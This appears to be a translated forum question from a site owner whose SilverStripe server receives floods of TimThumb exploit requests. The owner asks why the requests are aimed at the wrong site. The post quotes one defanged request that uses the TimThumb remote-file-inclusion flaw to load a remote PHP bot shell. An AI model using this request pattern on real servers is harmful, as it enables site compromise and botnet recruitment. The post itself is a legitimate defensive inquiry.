我的服务器 (mediaquarter.at) 目前正被这样的请求 DDoSed(有一些小的变化):hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/ timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php(网址“已停用”,因此不会有人意外点击它)
如果您尝试下载引用的 PHP 文件,请注意:在 preg_replace 中激活了 /e 开关,并且代码包含多个 eval 语句 - 在您想查看之前清理它!看起来像 pBot,你可以在这里找到更多信息:http ://www.offensivecomputing.net/?q=node/1417
TimThumb 容易受到远程文件包含的影响 (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - 似乎在WordPress。所以我会理解有人调用 hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php 来利用漏洞。
但是,尝试通过另一个网站 (mediaquarter.at) 调用它有什么意义,只会导致 404 错误消息?此外,我的服务器没有运行 WordPress,而是使用 SilverStripe,所以这似乎毫无意义。
这只是攻击者一方的错误/愚蠢,还是我在这里忽略了某种攻击媒介?
PS:服务器只是一些廉价的虚拟主机,我根本无法访问它,所以我无法验证系统是否有任何变化。